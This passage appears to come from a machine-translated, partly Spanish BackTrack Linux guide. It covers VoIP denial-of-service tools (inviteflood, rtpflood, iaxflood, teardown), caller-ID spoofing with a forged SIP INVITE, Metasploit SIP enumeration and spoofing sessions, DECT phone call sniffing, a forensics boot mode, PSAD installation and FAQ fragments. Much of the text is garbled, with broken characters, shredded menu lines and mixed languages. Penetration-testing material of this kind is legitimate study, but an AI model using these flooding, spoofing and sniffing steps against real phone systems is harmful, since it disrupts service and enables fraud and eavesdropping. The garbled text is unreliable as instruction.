-I <interface> (Obligatorio) Interfaz para olfatear / envo de paquetes
-M MAC> (Obligatorio) Direccin MAC del telfono IP vctima
-T <tftp servidor ip> (Opcional) Servidor tftp direccin IP
-C <cdp modo 0|1> (opcional) 0 CDP oler modo, un modo de parodia CDP
-V <Voice vlan <id (Opcional) Introduzca la ID de VLAN de voz
-R <vlan usuario> (opcional) Elimina la interfaz VLAN
-D (Opcional) verbose | modo de depuracin
Denial Of Service
Un ataque de denegacin de servicio en los servicios de VoIP puede hacerlo intil, causando un dao
intencional a la red y la disponibilidad de los sistemas de VoIP. Este ataque puede ocurrir en dos niveles,
ataques de red estndar DoS y ataques especficos de VoIP DOS. Generalmente se enviar toneladas de
datos por la inundacin de la red para consumir todos sus recursos o un protocolo especfico con el fin de
saturar con toneladas de peticiones. Vamos a echar un vistazo rpido de las herramientas disponibles en
Backtrack
Inviteflood
Esta herramienta puede ser utilizada para inundar un objetivo con peticiones INVITE puede ser utilizada
para combatir gateways SIP / apoderados y telfonos SIP.
root @ bt :/ pentest / voip / inviteflood #. / inviteflood
inviteflood - Versin 2.0
09 de junio 2006
Uso:
Obligatorio interfaz (por ejemplo eth0)
usuario de destino (por ejemplo, "" o john.doe o 5000 o "1 +210-555-1212")
dominio de destino (por ejemplo enterprise.com o una direccin IPv4)
IPv4 addr objetivo de inundacin (ddd.ddd.ddd.ddd)
inundacin etapa (es decir, nmero de paquetes)
Opcional -Una inundacin herramienta "De:" alias (por ejemplo jane.doe)
Mientras la herramienta mantiene inundando el gateway SIP, al evitar que los usuarios realicen llamadas
telefnicas. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not
found just to keep it busy.
Rtpflood
Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a
successful attack using rtpflood you will need know the RTP listening port on the remote device you want
to attack, for example; x-lite sofphone default rtp port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID
Iaxflood
IAXFlood es una herramienta para inundar el protocolo IAX2 que es utilizado por el asterisco PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets
Teardown
Teardown se utiliza para terminar una llamada mediante el envo de una peticin BYE
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag
First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id
value.
SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105; sucursal = z9hG4bKkfnyfaol, recibido = 192.168.1.105; rport =
5060
De: "200" ;tag=hcykd
Para: "200" ;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTRO
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFIQUE
Compatible con: sustituye
Expira: 3600
Contacto: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0
Spoofing Caller ID
Existen varios mtodos para la identificacin de llamadas spoofing que no vamos a discutir aqu, ya que
requiere un conjunto diferente de herramientas y equipos que no son relevantes para este propsito
artculo. Caller ID Spoofing en SIP es bastante fcil, slo tiene que cambiar la peticin SIP "INVITE" de
cabecera.
INVITE sip:@127.0.0.1 SIP/2.0
A: <sip:192.168.1.104>
Via: 192.168.1.104 SIP/2.0/UDP
De: "Hacker Evil"
Call-ID: 14810.0.1.45
CSeq: 1 INVITE
Max-Forwards: 20
Contact: <sip:127.0.0.1>
Vamos a echar un vistazo a una herramienta que ya hemos discutido llamado Inviteflood que se puede
Ejemplo de uso:
msf auxiliary(enumerator) > set RHOSTS 192.168.1.104 RHOSTS => 192.168.1.104 msf
auxiliary(enumerator) > set MINEXT 100 MINEXT => 100 msf auxiliary(enumerator) > set MAXEXT
500 MAXEXT => 500 msf auxiliary(enumerator) > set PADLEN 3 PADLEN => 3 msf
auxiliary(enumerator) > run [*] Found user: 200 <sip:200@192.168.1.104> [Auth] [*] Found user:
201 <sip:201@192.168.1.104> [Auth] [*] Found user: 202 <sip:202@192.168.1.104> [Auth] [*]
Found user: 203 <sip:203@192.168.1.104> [Auth] [*] Found user: 204 <sip:204@192.168.1.104>
[Auth] [*] Found user: 300 <sip:300@192.168.1.104> [Auth] [*] Scanned 1 of 1 hosts (100%
complete) [*] Auxiliary module execution completed
Ejemplo de uso:
msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104
Rhosts => 192.168.1.104
msf auxiliary(sip_invite_spoof) > run
[*] Sending Fake SIP Invite to: 192.168.1.104
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Closing Words
I hope you've found this document informative, please keep in mind that Backtrack Linux provides many
tools and features we haven't covered here. Take the time to browse the tools read the manuals and
README's I am sure you'll find the right tool for the job.
Feel free to discuss the tools and methods mentioned here in the Backtrack Linux Forums we would love
to here your feedback ideas and experiences.
http://www.backtrack-linux.org/forums/
Sobre el autor
Shai rod (aka @NightRang3r) is a full time Pen Tester at Avnet Information Security & Risk
Management in Israel; He holds the Offensive security OSCP and OSCE certifications (among others)
and manages his blog at http://exploit.co.il
Referencias
http://en.wikipedia.org/wiki/Session_Initiation_Protocol
http://tools.ietf.org/html/rfc3261
http://www.hackingvoip.com/
Contenido
[hide]
1 Qu es
DECT?
1.1
El
pro
ble
ma
?
1.2
Pro
bad
o
en
2
Instalacin
dedected
2.1
Inst
alac
in
del
rep
osit
orio
2.2
Inst
alac
in
des
de
el
cd
igo
fue
nte
3 Instale
algunas
herramient
as
adicionales
4 Cargue
los
controlador
es
5 Escanear
Qu es DECT?
http://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications
El problema?
La mayora de los vendedores no implementar el cifrado en sus dispositivos, de forma que uno puede
olerlo con determinado hardware y software.
En un post anterior sobre el tema, consulte: http://www.offensive-security.com/backtrack/sniffing-dectphones-the-details/
Probado en
BackTrack 5 KDE ltimo kernel 2.6.38 con x86
Original Dosch y Amand Tipo II PCMCIA Card
SIEMENS C1 Telfonos DECT configurado en modo repetidor
NOTA: Este es un programa experimental que no est muy apoyado activamente ms!
Instalacin dedected
Con el fin de obtener dedected instalado en BackTrack, usted tiene las siguientes opciones:
1. Utilice dedected de los BackTrack 5 repositorios.
2. Compilar por su cuenta si usted quiere experimentar.
Si no ha introducido su Dosch y tipo Amand 2 o Tipo 3 o Voo: doo # PCMCIA tarjeta hgalo ahora! A
continuacin, cargar el controlador:
root @ bt: ~ # make load
Si necesita informacin sobre el tipo de uso "ayuda". Si usted vive en la cerradura de EE.UU. a los
EE.UU. / DECT 6 banda a travs de la "banda" de comandos. Vamos a permitir someverbosity:
verbo
Despus de escanear 2-3 veces a travs de todos los canales de desactivar la verbosidad, y detener la
exploracin:
verbo
detener
Ahora toma el telfono DECT y hacer una llamada de prueba y espere hasta que aparezca la llamada
telefnica. Asimismo, es suficiente si usted acaba de obtener un tono de marcacin. Debera ver algo
como
Llamada # # # encontrado nuevo 00 82 31 33 73 en el canal 7 RSSI 34
detener
No haga caso de todos los telfonos excepto el suyo a travs del siguiente comando! IMPORTANTE!
ignorar 01 30 95 13 37
Ahora toma el telfono telefona DECT y hacer una Llamada prueba. Recomiendo llamar un "serivce
tiempo diciendo" que se puede llegar a travs de un nmero de telfono normal. Usted debe obtener algo
como esto:
# # # A partir AUTOREC
# # # Parando DIP
# # # A partir callscan
# # # Intentando sincronizar en ab b0 00 82 29
# # # Tiene sincronizacin
# # # Dumping dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap
# # # Parando DIP
Sugerencia: si slo se puede or el ruido del telfono parece utilizar algunos de codificacin / cifrado.
Puede activar el modo de repetidor en su telfono por lo que deshabilita el cifrado y se puede probar si su
configuracin est funcionando correctamente.
Limpiar / Recargar
Si tiene que volver a cargar los controladores
Protocolo DECT
Si usted est interesado en ms detalles del protocolo, puede abrir el archivo pcap en Wireshark.:
Forensics
Actualmente no hay texto en esta pgina. Puedes buscar este ttulo de pgina en otras pginas, o buscar
en los registros relacionados .
Forensics Boot
Forensics Boot
Desde BackTrack 4 y ahora BackTrack 5 te habrs dado cuenta de que tiene un Forensics
BackTrack BackTrack opcin pero qu es eso?
LiveCD y Forense
Durante mucho tiempo, ahora, Linux Live CD han sido muy tiles para fines de adquisicin forense en
los casos en que, por una razn u otra no se puede utilizar un bloqueador de escritura de hardware.
Cuando se configura no a las unidades de montaje automtico, y conocer un poco de la forma, un Linux
Live CD puede ser un bloqueador de software de escritura maravilloso. Para un CD de Linux en vivo
para ser considerado para este propsito, sin embargo, es de la mayor importancia que el uso de la CD en
vivo no altera en cualquier datos de cualquier manera. Esa es la razn principal por la que BackTrack se
puso en marcha en el pasado, BackTrack se montan automticamente los discos disponibles y utilizar las
particiones de intercambio cuando estn disponibles, al hacer esto BackTrack pudo causar todo tipo de
estragos, el cambio de los ltimos tiempos de montaje, la alteracin de datos en el disco, y as
sucesivamente . Pero como BackTrack 4 y ahora BackTrack 5 que no es el caso ms.
Cmo?
Por lo tanto, vamos a tener la primicia. Personas forenses son a menudo detallista y muy conservador, as
que cmo sabemos que es seguro de usar? Bueno, para empezar el BackTrack 5 CD en vivo se basa
fuera de Casper, y no contiene secuencias de comandos del sistema de archivos de montaje automtico en
absoluto. Los scripts de inicializacin del sistema se han modificado en el modo de arranque forense para
que BackTrack 5 no buscar o hacer uso de cualquier particin de swap que figuran en el sistema. Todos
estos scripts se han eliminado del sistema.
Verificacin:
Para probar esta funcionalidad, hemos probado esta modalidad de arranque con configuraciones de
hardware. Para cada prueba, se tom una instantnea antes MD5 de los discos del sistema, arranca en
modo de arranque BackTrack5 forense, verificado ningn sistema de archivos fueron montadas y swap
no estaba en uso, hizo una serie de actividades en el sistema, a continuacin, apague el sistema hacia
abajo y tom una instantnea despus de MD5. En la comparacin de las dos instantneas MD5, en cada
caso eran un partido, lo que demuestra ningn cambio en los discos se ha hecho.
Uso:
Cuando se utilizan con fines forenses Backtrack, asegrese de que no se esperar a que un arranque sin
supervisin. Arranque por defecto para Backtrack es el modo de arranque estndar, que utilizar las
particiones swap si estn presentes. Hay un retraso agradable sin embargo, por lo que tendr un montn
de tiempo para seleccionar el modo de arranque correcto. Tambin, por favor recuerde que esta es una
distribucin de Linux. Es altamente recomendable que se familiarice con Linux antes de usar este o
cualquier otro Live CD de Linux para propsitos forenses. Adems, asegrese de revisar las herramientas
forenses adicionales aadidos a Backtrack 5. Nos hemos concentrado en la adicin de imgenes y
herramientas de triage, pero si usted encuentra que uno de sus utilidades favoritas no est en su sitio, por
favor hganoslo saber para que podamos mirar en tener agreg.
Instalar PSAD
URL: http://www.nanotechfibers.com/
Twitter: ! http://twitter.com/ # / rickflores_
Email: nanoquetz9l@nanotechfibers.com
Instale PSAD:
root @ bt: / usr / local / src # tar xfj PSAD-2.1.7.tar.bz2
root @ bt: / usr / local / src # cd PSAD-2.1.7
root @ bt:. / usr/local/src/psad-2.1.7 # / install.pl
# Te gustara instalar las ltimas firmas de
# http://www.cipherdyne.org/psad/signatures (y / n)? y
Comience PSAD:
Tenga en cuenta que recibir el siguiente error:
root @ bt :/ usr/local/src/psad-2.1.7 # / etc / init.d / PSAD inicio
PSAD inicio: [*] No se pudo encontrar electrnico, editar el archivo / etc / PSAD / psad.conf en / usr /
sbin / lnea PSAD 9679.
Para solucionar este problema tendremos que editar psad.conf ubicado en / etc / PSAD / y agregar una
direccin de correo electrnico de la siguiente manera:
root @ bt :/ usr/local/src/psad-2.1.7 # vim / etc / PSAD / psad.conf
Instalar GPGDir
URL: http://www.nanotechfibers.com/
Twitter: ! http://twitter.com/ # / rickflores_
Email: nanoquetz9l@nanotechfibers.com
Instale gpgdir:
root @ bt: / usr / local / src / # tar gpgdir xfj gpgdir-1.9.5.tar.bz2
root @ bt: / usr / local / src / gpgdir # cd gpgdir-1.9.5
root @ bt:. / usr/local/src/gpgdir/gpgdir-1.9.5 # / install.pl
UGS CONOCIDOS
Preguntas ms frecuentes
Contenido
[hide]
1
BackTrack
Preguntas
frecuentes
2 Acabo de
instalar
BackTrack,
cul es la
contrasea
de root?
3 Por qu
mi parada
teclado
funciona
cuando
intento
escribir la
contrasea
?
4 Cmo
iniciar el
entorno
grfico?
BackTrack
5 Es libre
para
descargar?
6 Se
ofrecen
versiones
de 64 bits o
un gnomo
de
BackTrack
?
7 Qu
versin
debo
descargar?
8 Yo acabo
de quemar
mi iso y no
arranca?
9 Yo uso
Windows y
actualizacin del repositorio puede ocurrir en cualquier momento del da o de la noche durante la semana.
Tenga en cuenta que si bien el repo se est sincronizado, no estar disponible para su descarga los
paquetes. Este proceso no toma mucho tiempo, as que ser raro que esto cause alguno de vosotros tiene
ms de un perodo muy corto de indisponibilidad.
Por favor recuerde que esto mostrar todos los paquetes instalados en BackTrack y no slo las
herramientas
Tambin puede buscar en el repositorio para un paquete particular de inters, ejecute el comando
siguiente:
apt-cache search <keyword de interest>